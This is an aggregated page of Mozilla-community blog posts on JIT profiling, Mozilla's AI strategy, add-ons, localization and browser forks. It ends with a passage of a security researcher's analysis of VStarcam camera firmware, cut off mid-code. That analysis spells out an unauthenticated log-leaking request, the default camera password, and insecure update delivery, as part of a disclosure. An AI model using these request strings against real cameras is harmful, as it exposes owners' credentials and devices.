08 Jan 2026


Matthew Gaudet: Non-Traditional Profiling

Also known as "you can just put whatever you want in a jitdump you know?"

When you profile JIT code, you have to tell a profiler what on earth is going on in those JIT bytes you wrote out. Otherwise the profiler will shrug and just give you some addresses.

There's a decent and fairly common format called jitdump, which originates in perf but has become used in more places. The basic thrust of the parts we care about is: you have names associated with ranges.

Of course, the basic range you'd expect to name is "function foo() was compiled to bytes 0x1000-0x1400"
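To make "names associated with ranges" concrete, here is a rough C++ sketch of the JIT_CODE_LOAD record that does the naming, based on my reading of the perf jitdump specification (tools/perf/Documentation/jitdump-specification.txt in the Linux tree) - treat the field list as an approximation, not a reference:

#include <cstdint>

// Every record in a jitdump file starts with this common header.
struct JitRecordHeader {
  uint32_t id;          // record type; 0 == JIT_CODE_LOAD
  uint32_t total_size;  // size of the whole record, name and code included
  uint64_t timestamp;
};

// A JIT_CODE_LOAD record says: "the bytes at code_addr..code_addr+code_size
// belong to the function whose name follows".
struct JitCodeLoad {
  JitRecordHeader header;
  uint32_t pid;
  uint32_t tid;
  uint64_t vma;         // virtual address the code executes at
  uint64_t code_addr;   // address the code bytes were written to
  uint64_t code_size;   // length of the range being named
  uint64_t code_index;  // unique, monotonically increasing index
  // Followed in the file by a null-terminated function name,
  // then by the raw code bytes themselves.
};

The "function name" is just a string the profiler displays for the range - which is exactly the loophole the rest of this post exploits.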

Suppose you get that working. You might get a profile that looks like this one.

This profile is pretty useful: you can see from the flame chart what execution tier created the code being executed, and you can see code from inline caches, etc.

Before I left for Christmas break though, I had a thought: to a first approximation, both optimized and baseline code generation are fairly 'template' style. That is to say, we emit (relatively) stable chunks of code for each of our bytecodes, in the case of our baseline compiler, or for each of our intermediate-representation nodes, in the case of Ion, our top-tier compiler.

What if we looked more closely at that?

Some of our code is already tagged with AutoCreatedBy, an RAII class which pushes a creator string on, and pops it off when it goes out of scope. I went through and added AutoCreatedBy to each LIR op's codegen method (e.g. CodeGenerator::visit*). Then I rigged up our jitdump support so that instead of dumping functions, we dump the function name plus the whole chain of AutoCreatedBy as the 'function name' for the sequence of instructions generated while the AutoCreatedBy was live.
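For illustration, here is a minimal, self-contained sketch of how an AutoCreatedBy-style helper can maintain that chain - the MacroAssembler stand-in and its members are my invention for the example, not SpiderMonkey's actual API:

#include <cstdio>
#include <string>
#include <vector>

// Stand-in for the real MacroAssembler: all we model is the creator stack.
struct MacroAssembler {
  std::vector<std::string> creators;  // currently live creator strings
  std::string currentChain() const {
    std::string chain;
    for (const auto& c : creators) chain += "/" + c;
    return chain;
  }
};

// RAII: push a creator string on construction, pop it on destruction.
class AutoCreatedBy {
  MacroAssembler& masm_;

 public:
  AutoCreatedBy(MacroAssembler& masm, const char* name) : masm_(masm) {
    masm_.creators.push_back(name);
  }
  ~AutoCreatedBy() { masm_.creators.pop_back(); }
};

int main() {
  MacroAssembler masm;
  AutoCreatedBy compile(masm, "IonCompile");
  {
    AutoCreatedBy visit(masm, "visitHasShape");
    // Any instructions emitted here would have their jitdump range named
    // with the whole chain, e.g. "funcName/IonCompile/visitHasShape".
    printf("%s\n", masm.currentChain().c_str());
  }  // "visitHasShape" popped here
}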

That gets us this profile.

While it doesn't look that different, the key is in how the frames are named. Of course, the vast majority of frames are just the name of the call instruction... that only makes sense. However, you can see some interesting things if you invert the call tree.

For example, for a single self-hosted function, we spend 1.9% of the profiled time in code generated by 'visitHasShape', which is basically:

masm.loadObjShapeUnsafe(obj, output);
masm.cmpPtrSet(Assembler::Equal, output, ImmGCPtr(ins->mir()->shape()),
               output);

Which is not particularly complicated.

Ok, so that proves out the value. What if we just say... hmmm, I actually want to aggregate across all compilations: ignore the function name, just tell me the compilation path here.

Woah. Ok, now we've got something quite different, if really hard to interpret.

Even more interesting (easier to interpret) is the inverted call tree:

So across the whole program, we're spending basically 5% of the time doing guardShape. I think that's a super interesting slicing of the data.

Is it actionable? I don't know yet. I haven't really opened any bugs on this yet; a lot of the highlighted code is stuff where it's not clear that there is a faster way to do what's being done, short of engine architectural innovation.

The reason to write this blog post is basically to share that... man, we can slice and dice our programs in so many interesting ways. I'm sure there's more to think of. For example, not shown here was an experiment: I added AutoCreatedBy inside a single macro-assembler method set (around barriers) to try to see if I could actually see GC barrier cost (it's low on the benchmarks I checked).

So yeah. You can just... put stuff in your JIT dump file.

Edited to Add: I should mention this code is nowhere. Given I don't entirely know how actionable this ends up being, and the code quality is subpar, I haven't even pushed this code. Think of this as an inspiration, not a feature announcement.

08 Jan 2026 9:46pm GMT

The Mozilla Blog: Owners, not renters: Mozilla’s open source AI strategy


The future of intelligence is being set right now, and the path we're on leads somewhere I don't want to go. We're drifting toward a world where intelligence is something you rent - where your ability to reason, create, and decide flows through systems you don't control, can't inspect, and didn't shape. In that world, the landlord can change the terms anytime, and you have no recourse but to accept what you're given.

I think we can do better. Making that happen is now central to what Mozilla is doing.

What we did for the web

Twenty-five years ago, Microsoft Internet Explorer controlled 95% of the browser market, which meant Microsoft controlled how most people experienced the internet and who could build what on what terms. Mozilla was born to change this, and Firefox succeeded beyond what most people thought possible - dropping Internet Explorer's market share to 55% in just a few years and ushering in the Web 2.0 era. The result was a fundamentally different internet. It was faster and richer for everyday users, and for developers it was a launchpad for open standards and open source that decentralized control over the core technologies of the web.

There's a reason the browser is called a "user agent." It was designed to be on your side - blocking ads, protecting your privacy, giving you choices that the sites you visited never would have offered on their own. That was the first fight, and we held the line for the open web even as social networks and mobile platforms became walled gardens.

Now AI is becoming the new intermediary. It's what I've started calling "Layer 8" - the agentic layer that mediates between you and everything else on the internet. These systems will negotiate on our behalf, filter our information, shape our recommendations, and increasingly determine how we interact with the entire digital world.

The question we have to ask is straightforward: Whose side will your new user agent be on?

Why closed systems are winning (for now)

We need to be honest about the current state of play: Closed AI systems are winning today because they are genuinely easier to use. If you're a developer with an idea you want to test, you can have a working prototype in minutes using a single API call to one of the major providers. GPUs, models, hosting, guardrails, monitoring, billing - it all comes bundled together in a package that just works. I understand the appeal firsthand, because I've made the same choice myself on late-night side projects when I just wanted the fastest path from an idea in my head to something I could actually play with.

The open-source AI ecosystem is a different story. It's powerful and advancing rapidly, but it's also deeply fragmented - models live in one repository, tooling in another, and the pieces you need for evaluation, orchestration, guardrails, memory, and data pipelines are scattered across dozens of independent projects with different assumptions and interfaces. Each component is improving at remarkable speed, but they rarely integrate smoothly out of the box, and assembling a production-ready stack requires expertise and time that most teams simply don't have to spare. This is the core challenge we face, and it's important to name it clearly: What we're dealing with isn't a values problem where developers are choosing convenience over principle. It's a developer experience problem. And developer experience problems can be solved.

The ground is already shifting

We've watched this dynamic play out before and the history is instructive. In the early days of the personal computer, open systems were rough, inconsistent, and difficult to use, while closed platforms offered polish and simplicity that made them look inevitable. Openness won anyway - not because users cared about principles, but because open systems unlocked experimentation and scale that closed alternatives couldn't match. The same pattern repeated on the web, where closed portals like AOL and CompuServe dominated the early landscape before open standards outpaced them through sheer flexibility and the compounding benefits of broad participation.

AI has the potential to follow the same path - but only if someone builds it. And several shifts are already reshaping the landscape:

The capability gap that once justified the dominance of closed systems is closing fast. What remains is a gap in usability and integration. The lesson I take from history is that openness doesn't win by being more principled than the alternatives. Openness wins when it becomes the better deal - cheaper, more capable, and just as easy to use.

Where the cracks are forming

If openness is going to win, it won't happen everywhere at once. It will happen at specific tipping points - places where the defaults haven't yet hardened, where a well-timed push can change what becomes normal. We see four.

The first is developer experience. Developers are the ones who actually build the future - every default they set, every stack they choose, every dependency they adopt shapes what becomes normal for everyone else. Right now, the fastest path runs through closed APIs, and that's where most of the building is happening. But developers don't want to be locked in any more than users do. Give them open tools that work as well as the closed ones, and they'll build the open ecosystem themselves.

The second is data. For a decade, the assumption has been that data is free to scrape - that the web is a commons to be harvested without asking. That norm is breaking, and not a moment too soon. The people and communities who create valuable data deserve a say in how it's used and a share in the value it creates. We're moving toward a world of licensed, provenance-based, permissioned data. The infrastructure for that transition is still being built, which means there's still a chance to build it right.

The third is models. The dominant architecture today favors only the biggest labs, because only they can afford to train massive dense transformers. But the edges are accelerating: small models, mixtures of experts, domain-specific models, multilingual models. As these approaches mature, the ability to create and customize intelligence spreads to communities, companies, and countries that were previously locked out.

The fourth is compute. This remains the choke point. Access to specialized hardware still determines who can train and deploy at scale. More doors need to open - through distributed compute, federated approaches, sovereign clouds, idle GPUs finding productive use.

What an open stack could look like

Today's dominant AI platforms are building vertically integrated stacks: closed applications on top of closed models trained on closed data, running on closed compute. Each layer reinforces the next - data improves models, models improve applications, applications generate more data that only the platform can use. It's a powerful flywheel. If it continues unchallenged, we arrive at an AI era equivalent to AOL, except far more centralized. You don't build on the platform; you build inside it.

There's another path. The LAMP stack - Linux, Apache, MySQL, and PHP - won because that combination became easier to use than the proprietary alternatives, and because it let developers build things that no commercial platform would have prioritized. The web we have today exists because that stack existed.

We think AI can follow the same pattern. Not one stack controlled by any single party, but many stacks shaped by the communities, countries, and companies that use them:

Pieces of this stack already exist - good ones, built by talented people. The task now is to fill in the gaps, connect what's there, and make the whole thing as easy to use as the closed alternatives. That's the work.

Why open source matters here

If you've followed Mozilla, you know the Manifesto. For almost 20 years, it's guided what we build and how - not as an abstract ideal, but as a tool for making principled decisions every single day. Three of its principles are especially urgent in the age of AI:

Open-source AI is how these principles become real. It's what makes plurality possible - many intelligences shaped by many communities, not one model to rule them all. It's what makes sovereignty possible - owning your infrastructure rather than renting it. And it's what keeps the door open for public-benefit alternatives to exist alongside commercial ones.

What we'll do in 2026

The window to shape these defaults is still open, but it won't stay open forever. Here's where we're putting our effort - not because we have all the answers, but because we think these are the places where openness can still reset the defaults before they harden.

Make open AI easier than closed. Mozilla.ai is building any-suite, a modular framework that integrates the scattered components of the open AI stack - model routing, evaluation, guardrails, memory, orchestration - into something coherent that developers can actually adopt without becoming infrastructure specialists. The goal is concrete: Getting started with open AI should feel as simple as making a single API call.

Shift the economics of data. The Mozilla Data Collective is building a marketplace for data that is properly licensed, clearly sourced, and aligned with the values of the communities it comes from. It gives developers access to high-quality training data while ensuring that the people and institutions who contribute that data have real agency and share in the economic value it creates.

Learn from real deployments. Strategy that isn't grounded in practical experience is just speculation, so we're deepening our engagement with governments and enterprises adopting sovereign, auditable AI systems. These engagements are the feedback loops that tell us where the stack breaks and where openness needs reinforcement.

Invest in the ecosystem. We're not just building; we're backing others who are building too. Mozilla Ventures is investing in open-source AI companies that align with these principles. Mozilla Foundation is funding researchers and projects through targeted grants. We can't do everything ourselves, and we shouldn't try. The goal is to put resources behind the people and teams already doing the work.

Show up for the community. The open-source AI ecosystem is vast, and it's hard to know what's working, what's hype, and where the real momentum is building. We want to be useful here. We're launching a newsletter to track what's actually happening in open AI. We're running meetups and hackathons to bring builders together. We're fielding developer surveys to understand what people actually need. And at MozFest this year, we're adding a dedicated developer track focused on open-source AI. If you're doing important work in this space, we want to help it find the people who need to see it.

Are you in?

Mozilla is one piece of a much larger movement, and we have no interest in trying to own or control it - we just want to help it succeed. There's a growing community of people who believe the open internet is still worth defending and who are working to ensure that AI develops along a different path than the one the largest platforms have laid out. Not everyone in that community uses the same language or builds exactly the same things, but something like a shared purpose is emerging. Mozilla sees itself as part of that effort.

We kept the web open not by asking anyone's permission, but by building something that worked better than the alternatives. We're ready to do that again.

So: Are you in?

If you're a developer building toward an open source AI future, we want to work with you. If you're a researcher, investor, policymaker, or founder aligned with these goals, let's talk. If you're at a company that wants to build with us rather than against us, the door is open. Open alternatives have to exist - that keeps everyone honest.

The future of intelligence is being set now. The question is whether you'll own it, or rent it.

We're launching a newsletter to track what's happening in open-source AI - what's working, what's hype, and where the real momentum is building. Sign up here to follow along as we build.

Read more here about our emerging strategy, and how we're rewiring Mozilla for the era of AI.


08 Jan 2026 7:05pm GMT

Firefox Add-on Reviews: 2025 Staff Pick Add-ons

While nearly half of all Firefox users have installed an add-on, it's safe to say nearly all Firefox staffers use add-ons. I polled a few of my peers and here are some of our staff favorite add-ons of 2025…

Falling Snow Animated Theme

Enjoy the soothing mood of Falling Snow Animated Theme. This motion-animated dark theme turns Firefox into a calm wintry night as snowflakes cascade around the corners of your browser.

Privacy Badger

The flagship anti-tracking extension from privacy proponents at the Electronic Frontier Foundation, Privacy Badger is built to look for a certain set of actions that indicate a web page is trying to secretly track you.

Zero setup required. Just install Privacy Badger and it will automatically search for third-party cookies, HTML5 local storage "supercookies," canvas fingerprinting, and other sneaky tracking methods.

Adaptive Tab Bar Color

Turn Firefox into an internet chameleon. Adaptive Tab Bar Color changes the colors of Firefox to match whatever website you're visiting.

It's beautifully simple and sublime. No setup required, but you're free to make subtle adjustments to color contrast patterns and assign specific colors for websites.

Rainy Spring Sakura by MaDonna

Created by MaDonna, one of the most prolific theme designers in the Firefox community, Rainy Spring Sakura offers a bucolic mix of calming colors that we love.

It's like instant Zen mode for Firefox.

Return YouTube Dislike

Do you like the Dislike? YouTube removed the thumbs-down display, but fortunately Return YouTube Dislike came along to restore our view into the sometimes brutal truth of audience sentiment.

Other Firefox users seem to agree…

"Does exactly what the name suggests. Can't see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool."

Firefox user OFG

"i have never smashed 5 stars faster."

Firefox user 12918016

Return YouTube Dislike re-enables a beloved feature.

LeechBlock NG

Block time-wasting websites with LeechBlock NG - easily one of our staff-favorite productivity tools.

Lots of customization features help you stay focused and free from websites that have a way of dragging you down. Key features:

DarkSpaceBlue

Drift through serene outer space as you browse the web. DarkSpaceBlue celebrates the infinite wonder of life among the stars.

LanguageTool - Grammar and Spell Checker

Improve your prose anywhere you write on the web. LanguageTool - Grammar and Spell Checker will make you a better writer in 25+ languages.

Much more than a basic spell checker, this privacy-centric writing aid is packed with great features:

LanguageTool can help with subtle syntax improvements.

Sink It for Reddit!

Imagine a more focused, free-feeling Reddit - that's Sink It for Reddit!

Some of our staff-favorite features include:

Sushi Nori

Turns out we have quite a few sushi fans at Firefox. We celebrate our love of sushi with the savory theme Sushi Nori.

08 Jan 2026 2:59pm GMT

07 Jan 2026


Mozilla Localization (L10N): Mozilla Localization in 2025

A Year in Data

As is tradition, we're wrapping up 2025 for Mozilla's localization efforts and offering a sneak peek at what's in store for 2026 (you can find last year's blog post here).

Pontoon's metrics in 2025 show a stable picture for both new sign-ups and monthly active users. While we always hope to see signs of strong growth, this flat trend is a positive achievement when viewed against the challenges surrounding community involvement in Open Source, even beyond Mozilla. Thank you to everyone actively participating on Pontoon, Matrix, and elsewhere for making Mozilla localization such an open and welcoming community.

The number of strings added has decreased significantly overall, but not for Firefox, where the number of new strings was 60% higher than in 2024 (check out the increase of Fluent strings alone). That is not surprising, given the number of new features (selectable profiles, unified trust panel, backup) and the upcoming settings redesign.

As in 2024, the relentless growth in the number of locales is driven by Common Voice, which now has 422 locales enabled in Pontoon (+33%).

Before we move forward, thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla's localization over the last 12 months - or plan to do so in 2026. There is always space for new contributors!

Pontoon Development

A significant part of the work on Pontoon in 2025 isn't immediately visible to users, but it lays the groundwork for improvements that will start showing up in 2026.

One of the biggest efforts was switching to a new data model to represent all strings across all supported formats. Pontoon currently needs to handle around ten different formats, as transparently as possible for localizers, and this change is a step to reduce complexity and technical debt. As a concrete outcome, we can now support proper pluralization in Android projects, and we landed the first string using this model in Firefox 146. This removes long-standing UX limitations (no more "Bookmarks saved: %1$s" instead of "%1$s bookmarks saved") and allows languages to provide more natural-sounding translations.

In parallel, we continued investing in a unified localization library, moz-l10n, with the goal of having a centralized, well-maintained place to handle parsing and serialization across formats in both JavaScript and Python. This work is essential to keep Pontoon maintainable as we add support for new technologies and workflows.

Pontoon as a project remains very active. In 2025 alone, Pontoon saw more than 200 commits from over 20 contributors, not including work happening in external libraries such as moz-l10n.

Finally, we've been improving API support, another area that is largely invisible to end users. We moved away from GraphQL and migrated to Django REST, and we're actively working toward feature parity with Transvision to better support automation and integrations.

Community

Our main achievement in 2025 was organizing a pilot in-person event in Berlin, reconnecting localizers from around Europe after a long hiatus. Fourteen volunteers from 11 locales spent a weekend together at the Mozilla Berlin office, sharing ideas, discussing challenges, and deepening relationships that had previously existed only online. For many attendees, this was the first time they met fellow contributors they had collaborated with for years, and the energy and motivation that came out of those days clearly showed the value of human connection in sustaining our global community.

Group dinner for the localization event in Berlin

This doesn't mean we stopped exploring other ways to connect. For example, throughout the year we continued publishing Contributor Spotlights, showcasing the amazing work of individual volunteers from different parts of the world. These stories highlight not just what our contributors do, but who they are and why they make Mozilla's localization work possible.

Internally, these spotlights have played an important role in advocating on behalf of the community. By bringing real voices and contributions to the forefront, we've helped reinforce the message that investing in people - not just tools - is essential to the long-term health of Mozilla's localization ecosystem.

What's coming in 2026

As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.

This excerpt comes from last year's blog post, and while it took longer than expected, the good news is that we're finally there. On January 6, we moved Pontoon to a new hosting platform. We expect this change to bring better reliability and performance, especially in response to peaks in bot traffic that have previously made Pontoon slow or unresponsive.

In parallel, we "silently" launched the Mozilla Language Portal, a unified hub that reflects Mozilla's unique approach to localization while serving as a central resource for the global translator community. While we still plan to expand its content, the main infrastructure is now in place and publicly available, bringing together searchable translation memories, documentation, blog posts, and other resources to support knowledge-sharing and collaboration.

On the technology side, we plan to extend plural support to iOS projects and continue improving Pontoon's translation memory support. These improvements aim to make it easier to reuse translations across projects and formats, for example by matching strings independently of placeholder syntax differences, and to translate Fluent strings with multiple values.
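As a sketch of the placeholder-matching idea (the general technique, not Pontoon's actual implementation): normalize every placeholder syntax to a single generic token before comparing strings, so that printf-style and Fluent-style placeholders hit the same translation memory entry. The regexes below cover just those two syntaxes.

#include <iostream>
#include <regex>
#include <string>

// Replace printf-style (%s, %1$s) and Fluent-style ({ $var }) placeholders
// with one generic token before comparison.
std::string normalizePlaceholders(const std::string& s) {
  static const std::regex printfStyle(R"(%(\d+\$)?[sd])");
  static const std::regex fluentStyle(R"(\{\s*\$\w+\s*\})");
  return std::regex_replace(std::regex_replace(s, printfStyle, "{ph}"),
                            fluentStyle, "{ph}");
}

int main() {
  // Two spellings of the same source string now compare equal:
  std::cout << std::boolalpha
            << (normalizePlaceholders("%1$s bookmarks saved") ==
                normalizePlaceholders("{ $count } bookmarks saved"))
            << "\n";  // prints "true"
}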

We also aim to explore improvements in our machine translation options, evaluating how large language models could help with quality assessment or serve as alternative providers for MT suggestions.

Last but not least, we plan to keep investing in our community. While we don't know yet what that will look like in practice, keep an eye on this blog for updates.

If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!

Thank you!

As we look toward 2026, we're grateful for the people who make Mozilla's localization possible. Through shared effort and collaboration, we'll continue breaking down barriers and building a web that works for everyone. Thank you for being part of this journey.

07 Jan 2026 1:51pm GMT

Ludovic Hirlimann: Are Mozilla's forks any good?

To answer that question, we first need to understand how complex, writing or maintaining a web browser is.

A "modern" web browser is :

Of course, all the above points interact with one another in different ways. In order for "the web" to work, standards are developed and then implemented in the different browsers' rendering engines.

In order to "make" the browser, you need engineers to write and maintain the code, which is probably around 30 Million lines of code[5] for Firefox. Once the code is written, it needs to be compiled [6] and tested [6]. This requires machines that run the operating system the browser ships to (As of this day, mozilla officially ships on Linux, Microslop Windows and MacOS X - community builds for *BSD do exists and are maintained). You need engineers to maintain the compile (build) infrastructure.

Once the engineers that are responsible for the releases [7] have decided what codes and features were mature enough, they start assembling the bits of code and like the engineers, build, test and send the results to the people using said web browser.

When I was employed at Mozilla (the company that makes Firefox), around 900+ engineers were tasked with the above, and a few more were working on research and development. These engineers work 5 days a week, 8 hours per day - that's 1,872,000 hours of engineering brain power spent every year on making Firefox versions (it's actually less, because I have not taken vacations into account). On top of that, you need to add the cost of building and running the tests before a new version reaches the end user.

The current browsing landscape looks dark: there are currently three choices of rendering engine - WebKit-based browsers, Blink-based ones, and Gecko-based ones. 90+% of the market is dominated by WebKit/Blink-based browsers (Blink is a fork of WebKit, itself a descendant of KHTML). This leads to less standards work: if the major engine implements a feature, others need to play catch-up to stay relevant. This happened in the 2000s with IE dominating the browser landscape [8], making it difficult to use Mac OS 9 or X (I'm not even mentioning Linux here :)). This also leads to most web developers using Chrome and only once in a while testing with Firefox or even Safari. And if there's a little glitch, they can still ship because of market share.

The Mozilla codebase was started back in 1998, when embedding software was not really a consideration, given all the platforms that were to be supported. Firefox is very hard to embed (e.g. use as a software library and add stuff on top). I know that for a fact because both Camino and Thunderbird embed Gecko.

In the last few years, Mozilla has been irking the people I connect with, who are very privacy-focused and do not look kindly on what Mozilla does with Firefox. I believe that Mozilla does this in order to stay relevant to normal users. It needs to stay relevant for at least two reasons:

  1. To keep the web standards open, so anyone can implement a web browser / web services.
  2. To have enough traffic to be able to pay all the engineers working on Gecko.

Now that I've explained a few important things, let's answer the question: "Are Mozilla's forks any good?"

I am biased, as I've worked for the company before. But how can a few people, even if they are good and have plenty of free time, cope with what maintaining a fork requires:

If you are comfortable with that, then using a fork because Mozilla is pushing stuff you don't want is probably doable. If not, you can always kill those features you don't like using some `about:config` magic.

Now, I've set a tone above that foresees a dark future for open web technologies. What can you do to keep the web open and with some privacy focus?

  1. Keep using Mozilla Nightly
  2. Give servo a try

[1] HTML is interpreted code; that's why it needs to be parsed and then rendered.

[2] In order to draw an image or a photo on a screen, you need to be able to encode or decode it. Many file formats are available.

[3] JavaScript is a computer language that transforms HTML into something that can interact with the person using the web browser. See https://developer.mozilla.org/en-US/docs/Glossary/JavaScript

[4] Operating systems need at the very least to know which program to open files with. The OS landscape has changed a lot over the last 25 years. These days you need to support 3 major OSes, while in the 2000s you had more systems - IRIX, for example. You still have some portions of the Mozilla code base that support these long-dead systems.

[5] https://math.answers.com/math-and-arithmetic/How_many_lines_of_code_in_mozillafirefox

[6] Testing implies testing the code and also having engineers or users use the unfinished product to check that it doesn't regress. Testing Mozilla is explained at https://ehsanakhgari.org/wp-content/uploads/talks/test-mozilla/

[7] Read: a release equals a version. Version 1.5 is a release, as is version 3.0.1.

[8] https://en.wikipedia.org/wiki/Browser_wars

07 Jan 2026 1:26pm GMT

Wladimir Palant: Backdoors in VStarcam cameras

VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.

So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customers' passwords.

A reminder: "P2P" functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only addressed by configuring the network firewall to deny internet access.


How to recognize affected cameras

Not every VStarcam camera has "VStarcam" printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.

Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.

Downloading the firmware

VStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn't be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.

Both requests are performed over plain HTTP, and this is already the first issue. If an attacker can produce a manipulated response on the network that either the app or the device is connected to, they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted networks while out.

The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don't have an active update, and when they do some updates won't download because the servers in question appear no longer operational. Still, I found 380 updates this way.

I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn't for a camera but rather some device with an HDMI connector and without any P2P functionality - probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn't using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren't updating the camera application but only the base system. This left 367 firmware versions for this investigation.

Caveats of this survey

I do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn't possible, I simply don't know how it behaves. Similarly, the firmware's interaction with hardware had to be left out of the emulation. While I'm still quite confident in my results, these limitations could introduce errors.

More importantly, there are only so many firmware versions that I checked manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here; I expect that there are more issues with VStarcam firmware than what's listed here.

VStarcam's authentication approach

When an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren't HTTP requests passed on to a web server. Instead, the firmware handles these in the function P2pCgiParamFunction, which doesn't even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, you'd better not set check_user.cgi as your access password). Parameter extraction works via similar substring matching.
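Here is my reconstruction of that dispatch style as a small runnable sketch (the function and helper names are mine, not the firmware's): because the command is identified by a substring search over the whole request, the endpoint name can match anywhere - including inside a password.

#include <cstdio>
#include <cstring>
#include <string>

// Pull out the value following `key`, up to the next '&' or end of string.
std::string extractParam(const char* request, const char* key) {
  const char* pos = strstr(request, key);
  if (!pos) return "";
  pos += strlen(key);
  const char* end = strchr(pos, '&');
  return end ? std::string(pos, end) : std::string(pos);
}

void handleRequest(const char* request) {
  // No HTTP parsing: the endpoint "match" is a plain substring search.
  if (strstr(request, "check_user.cgi")) {
    std::string user = extractParam(request, "loginuse=");
    std::string pass = extractParam(request, "loginpas=");
    printf("login attempt: user=%s pass=%s\n", user.c_str(), pass.c_str());
  }
  // ...more strstr() checks would follow for the other endpoints...
}

int main() {
  handleRequest(
      "GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888");
}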

It's worth noting that these cameras have a very peculiar authentication system which VStarcam calls "dual authentication." Here is how the Eye4 application describes it:

The dual authentication mechanism is a measure to upgrade the whole system security

  1. The device will double check the identity of the visitor and does not support the old version of app.
  2. Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
  3. After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.

I'm not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name "ciphertext".

What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn't a big difference between the two, both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.

From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it's still a plaintext password used for authentication.

There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user's cloud account, apparently meant to make sure that only the right user can access a device.

Yet in many firmware versions I've seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.

None of this stopped VStarcam from boasting on their website merely a year ago:

A promotion image with the following text: O-KAM Pro. Dual authentication mechanism. AES financial grade encryption + dual authentication. We highly protect your data and privacy. Server distribution: low-power devices, 4 master servers, namely Hangzhou, Hong Kong, Frankfurt, Silicon Valey, etc.

You can certainly count on anything saying "financial grade encryption" being bullshit. I have no idea where AES comes into the picture here, I haven't seen it being used anywhere. Maybe it's their way of saying "we use TLS when connecting to our cloud infrastructure."

Endpoint protection

A reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.

The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn't obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.

Unauthenticated log access

So a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn't a request that any of the VStarcam apps seem to support, what does it do?

Despite the name this isn't a download request, it rather sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module but the essence is this: whenever the application logs something via LogSystem_WriteLog function, the application won't merely print that to stderr and write it to the log file on the SD card but also send it to any connection that has this flag set.

What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:

LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0,
                   "upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", );
LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1,
                   "address=%s token =%s master= %d timestamp = %d", );
LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2,
                   "token=%s", );

It could log cloud server responses:

LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3,
                   "\n\nrspBuf = %s\n", );
LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0,
                   "\n\nrspBuf = %s\n", );
LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0,
